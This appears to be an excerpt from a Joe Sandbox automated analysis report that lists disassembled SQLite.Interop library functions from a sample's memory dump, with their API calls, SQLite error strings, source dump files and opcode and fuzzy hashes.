                                                                                      • Instruction ID: 4ca759ebe41a26039438425e4c6029e67b1b7150ba841804d6dea1bf2b4e1467
                                                                                      • Opcode Fuzzy Hash: 451c64d322b3c064dfae01f1bf1705ef626072bd94e3986b26f3857b41eac4e8
                                                                                      • Instruction Fuzzy Hash: 9D4105B16042055BD314CF19DC85E6BF7E9FBC8319F044A2DF88992702D735DA198BE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C422840 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C422969
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C422979
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C422982
                                                                                      Strings
                                                                                      • wrong number of arguments to function rtreecheck(), xrefs: 6C42285A
                                                                                      • main, xrefs: 6C4228CA
                                                                                      • string or blob too big, xrefs: 6C422950
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I943321d364f02e5d.
                                                                                      • String ID: main$string or blob too big$wrong number of arguments to function rtreecheck()
                                                                                      • API String ID: 3215320522-104142269
                                                                                      • Opcode ID: 366cb07a4e9840f9842336c036ea29d58bce80a8a8c37bed4c3e4bf12b357cfa
                                                                                      • Instruction ID: 46d75332a9673a28c77b7b381d8bd01cd64303f08abf5a56b6d364589d3243ee
                                                                                      • Opcode Fuzzy Hash: 366cb07a4e9840f9842336c036ea29d58bce80a8a8c37bed4c3e4bf12b357cfa
                                                                                      • Instruction Fuzzy Hash: 0641F972B1812457D720CA19DC4BFAA7355DB8133DF244369EC389B7C2DB3AD84A82D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C422F00 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,6C4FFF14,00000000,?,+Bl), ref: 6C422F50
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,6C4FFF14,00000000,?,+Bl), ref: 6C422F56
                                                                                        • Part of subcall function 6C423190: SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,00000000,?,?,00000000,?), ref: 6C4231C1
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(?,00000000,?,?,00000000,?,+Bl), ref: 6C422F99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.If8364af380546f2d.Ifc350ae509dc2b53.
                                                                                      • String ID: +Bl$%_parent$%_rowid$Found (%lld -> %lld) in %s table, expected (%lld -> %lld)$Mapping (%lld -> %lld) missing from %s table
                                                                                      • API String ID: 1009223498-2110411907
                                                                                      • Opcode ID: 7d461f1b397ea5b0771dbc9df0e78b8a428bf8b78928c9713c6e513cc75b2149
                                                                                      • Instruction ID: b2e4e85640a9af150592504261952e8f22e1f58d904278e6b8a763cddfe90c42
                                                                                      • Opcode Fuzzy Hash: 7d461f1b397ea5b0771dbc9df0e78b8a428bf8b78928c9713c6e513cc75b2149
                                                                                      • Instruction Fuzzy Hash: 1531D5B5900204BBEB21CE45DC82F9FB7B9AF88315F04451DF819A2B51E734D951DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4466E0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,?,?,?,6C40EFCC,?), ref: 6C44671D
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029558,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C44673B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$invalid$misuse$unknown error
                                                                                      • API String ID: 1952225102-2663885796
                                                                                      • Opcode ID: a00e261d678bf04ec41f7f4ad258e37cd7b1efd32ff27b2e7e073c6acba38137
                                                                                      • Instruction ID: 7258edac215c25e177911551e3f0d5e777d7b94237046bdc539b98030724c97f
                                                                                      • Opcode Fuzzy Hash: a00e261d678bf04ec41f7f4ad258e37cd7b1efd32ff27b2e7e073c6acba38137
                                                                                      • Instruction Fuzzy Hash: BB213832B447505BFA04DB699C45FD333E6DBC122AF25483DE929C3F41D721E80682D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448210 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,00000000,00000000,6C445A60), ref: 6C44823A
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028FFA,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000,6C445A60), ref: 6C448258
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C448251
                                                                                      • misuse, xrefs: 6C44824C
                                                                                      • API call with %s database connection pointer, xrefs: 6C448233
                                                                                      • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C4482B8
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C448242
                                                                                      • invalid, xrefs: 6C44822E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                      • API String ID: 1952225102-2217220134
                                                                                      • Opcode ID: e88b6dbea9eb0f33affe0ebda0a0654ed650052fcd85bf20528c01e77b4da41b
                                                                                      • Instruction ID: 13bf9b9363c46b9d12852b8e336d752796d7aa370ff84d407d1c711e1a237d5d
                                                                                      • Opcode Fuzzy Hash: e88b6dbea9eb0f33affe0ebda0a0654ed650052fcd85bf20528c01e77b4da41b
                                                                                      • Instruction Fuzzy Hash: C2113621301FA017FA15E2A85C05F9B6786EB8131EF34882FF966D7FC2DF44940682E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4465C0 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,?,6C445A4D,00000000), ref: 6C4465E6
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002959A,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,6C445A4D,00000000), ref: 6C446604
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4465FD
                                                                                      • MZDl, xrefs: 6C4465C4
                                                                                      • misuse, xrefs: 6C4465F8
                                                                                      • API call with %s database connection pointer, xrefs: 6C4465DF
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4465EE
                                                                                      • invalid, xrefs: 6C4465DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$MZDl$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$invalid$misuse
                                                                                      • API String ID: 1952225102-381389155
                                                                                      • Opcode ID: 109a5ba7ef8c429d83bfcd76499f785cc5d91895a70fda0822839504b819be89
                                                                                      • Instruction ID: 7d226616b10bdb920d86b35c8d2ca01f615b45908418cb6f62faa6856e42814f
                                                                                      • Opcode Fuzzy Hash: 109a5ba7ef8c429d83bfcd76499f785cc5d91895a70fda0822839504b819be89
                                                                                      • Instruction Fuzzy Hash: 5CF0BB3154C288A6FA08E748FC41FE53B95879131EF34445EF52C9FF43D656944305E5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41CC80 Relevance: 13.9, APIs: 9, Instructions: 371COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIf8ee6276be88ce12.SQLITE.INTEROP(00000000,?,?), ref: 6C41CD27
                                                                                      • SI4983499b64278231.SQLITE.INTEROP(00000000,00000000,?,?,?), ref: 6C41CD6F
                                                                                      • SI4983499b64278231.SQLITE.INTEROP(00000000,00000000,?,?,?), ref: 6C41CD97
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(00000000,00000000,?,?,?,?,?), ref: 6C41CDBD
                                                                                      • SIa3f7b31190ce0815.SQLITE.INTEROP(00000000,00000000,?,?,?,?,?), ref: 6C41CDDB
                                                                                      • SI4983499b64278231.SQLITE.INTEROP(00000000,6C41C1CF,?,?,?), ref: 6C41CE3C
                                                                                      • SId99ac2a61d035e11.SQLITE.INTEROP(00000000,6C41C1CF,?,?,?,?,?), ref: 6C41CE4F
                                                                                      • SIbc9b0b73a965892b.SQLITE.INTEROP(00000000,6C41C1CF,?,?,?,?,?,?,?), ref: 6C41CE63
                                                                                      • SIf8ee6276be88ce12.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?), ref: 6C41CFD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I4983499b64278231.$If8ee6276be88ce12.$Ia3f7b31190ce0815.Ibc9b0b73a965892b.Id99ac2a61d035e11.If8364af380546f2d.
                                                                                      • String ID:
                                                                                      • API String ID: 1335909063-0
                                                                                      • Opcode ID: b004b8ab911c1ced2aca3f121ffe6724356d980be8b1b73a58a294a47adb575a
                                                                                      • Instruction ID: 849d52dbde30a46c4337158f6d7d66d0d06eab65051fa09017abef6964d3b861
                                                                                      • Opcode Fuzzy Hash: b004b8ab911c1ced2aca3f121ffe6724356d980be8b1b73a58a294a47adb575a
                                                                                      • Instruction Fuzzy Hash: 66D1C3B5E082149FCF01DF68CC80FADBBB5AF45319F188169E899A7B41E730DA45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3DEC8A Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                      • String ID:
                                                                                      • API String ID: 1282221369-0
                                                                                      • Opcode ID: e192ee441b50c35d3f5d0c87e221f51e2ac939b62e95ebcf81359d4ad0dcfef5
                                                                                      • Instruction ID: a4842e03bd3ff4f869e36ae371f869d6e67596398f09dbe65fdc9799a5fb08b2
                                                                                      • Opcode Fuzzy Hash: e192ee441b50c35d3f5d0c87e221f51e2ac939b62e95ebcf81359d4ad0dcfef5
                                                                                      • Instruction Fuzzy Hash: 87610773945301AFDB159F788844699FFA4AF0271CB17026DE95497B40DF32B9088FD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C49AC10 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 346COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___swprintf_l.LIBCMT ref: 6C49AE95
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C49AF75
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,00000000), ref: 6C49AFDA
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C49AFF9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I943321d364f02e5d.___swprintf_l
                                                                                      • String ID: "%w" $%Q%s$string or blob too big
                                                                                      • API String ID: 180130719-1379280010
                                                                                      • Opcode ID: cd7b32601264b58b9ef3163ce8880d3f9a40182d9f1c0fe0ae99b932564ddd54
                                                                                      • Instruction ID: 6419ad2d19ee5cb61d35fb9672894e580de51c246f87188fc054bebb7bbc1bae
                                                                                      • Opcode Fuzzy Hash: cd7b32601264b58b9ef3163ce8880d3f9a40182d9f1c0fe0ae99b932564ddd54
                                                                                      • Instruction Fuzzy Hash: F9C1A571A083119FD704CF19C840F5BBBE2AFC9319F184A2DE8A997B55E731E905CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C410C00 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: domain error$string or blob too big
                                                                                      • API String ID: 0-3775860708
                                                                                      • Opcode ID: e04d75f4c1934ac09b4640f3d91c0908975060b15c0921f77fc8b03c394cc8c9
                                                                                      • Instruction ID: 924ab3e20e89b68a19d0dcca1b3d19f7c752c429740c31fe6e73ef26bc519782
                                                                                      • Opcode Fuzzy Hash: e04d75f4c1934ac09b4640f3d91c0908975060b15c0921f77fc8b03c394cc8c9
                                                                                      • Instruction Fuzzy Hash: 0091097170C3814BD704CE19D881E6AB791EB8932DF28476DE8E897F81D732D85687D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43A370 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C43A45A
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C43A4A6
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,6C5038FC), ref: 6C43A5B7
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,6C5038FC), ref: 6C43A5DF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,6C5038FC), ref: 6C43A5E8
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?,?,?,6C5038FC), ref: 6C43A654
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: x
                                                                                      • API String ID: 223094752-2363233923
                                                                                      • Opcode ID: 1db04f75d3f44b2e39fa8836d7785a963809c9a20fafe271f7fdf6389679b4d6
                                                                                      • Instruction ID: d2987ffd418c935edb3be3d090cd1d4f161cad5110bcbb7dc54f9c895b468add
                                                                                      • Opcode Fuzzy Hash: 1db04f75d3f44b2e39fa8836d7785a963809c9a20fafe271f7fdf6389679b4d6
                                                                                      • Instruction Fuzzy Hash: 18A188B1A483119FD700CF5AC880E5BB7E5AFC8318F11492DF89997751EB35E909CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C410EE0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 246COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: domain error$string or blob too big
                                                                                      • API String ID: 0-3775860708
                                                                                      • Opcode ID: a18a57bff6eaa334c2ce08e9f10d57432d8f26051f0684cd1f3f504dd77e5eb5
                                                                                      • Instruction ID: 112dd8081f2c42913eccdc096a177c0db1d93d10f69a5892c713886d9236090f
                                                                                      • Opcode Fuzzy Hash: a18a57bff6eaa334c2ce08e9f10d57432d8f26051f0684cd1f3f504dd77e5eb5
                                                                                      • Instruction Fuzzy Hash: 7B713B3170C2854BDB00CE289841F79B7A19B95339F24076DE8E997FC1D772D85A83D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42A380 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C42A590
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C42A599
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                                      • API String ID: 223094752-131617836
                                                                                      • Opcode ID: 3015bcc01cf8d467360efb3213ab87d3ad62b75b509cd5afab44c30e1ebfb8ab
                                                                                      • Instruction ID: 061726157af5205b06a2d5cadbfc6dbde37d08bc2c125928ebc2e893de44687d
                                                                                      • Opcode Fuzzy Hash: 3015bcc01cf8d467360efb3213ab87d3ad62b75b509cd5afab44c30e1ebfb8ab
                                                                                      • Instruction Fuzzy Hash: BE61E276A082018BD301CF18D481E6AF7B2FF46338F5986A8DC595BB05E735ED86C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C408BF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C408C7A
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C408C95
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,00000000,?), ref: 6C408D84
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(invalid fts5 file format (found %d, expected %d) - run 'rebuild',00000000,00000004), ref: 6C408DBC
                                                                                        • Part of subcall function 6C477A30: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      Strings
                                                                                      • SELECT k, v FROM %Q.'%q_config', xrefs: 6C408C2D
                                                                                      • version, xrefs: 6C408CC5
                                                                                      • invalid fts5 file format (found %d, expected %d) - run 'rebuild', xrefs: 6C408DB7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9c6d7cd7b7d38055.$I1c7a7970970b9619.I950480ab972e108d.Ifc350ae509dc2b53.
                                                                                      • String ID: SELECT k, v FROM %Q.'%q_config'$invalid fts5 file format (found %d, expected %d) - run 'rebuild'$version
                                                                                      • API String ID: 157644305-3982129415
                                                                                      • Opcode ID: 88a45e70092a131cecc9b8e9e15395cd7d8346b578baccc6f22e882b0aa5cdf2
                                                                                      • Instruction ID: 1d2ae93e695e6475bab064bea29fe294bab8e9cebb94862e4d53236f2b201ca6
                                                                                      • Opcode Fuzzy Hash: 88a45e70092a131cecc9b8e9e15395cd7d8346b578baccc6f22e882b0aa5cdf2
                                                                                      • Instruction Fuzzy Hash: 125113B16483029BC300CF259980E6BB7E5AFD535DF140A3EE89997B41E730E809CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42E6F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000002,00000000), ref: 6C42E7A2
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,00000008,?,?,00000001,00000002,00000000), ref: 6C42E7B0
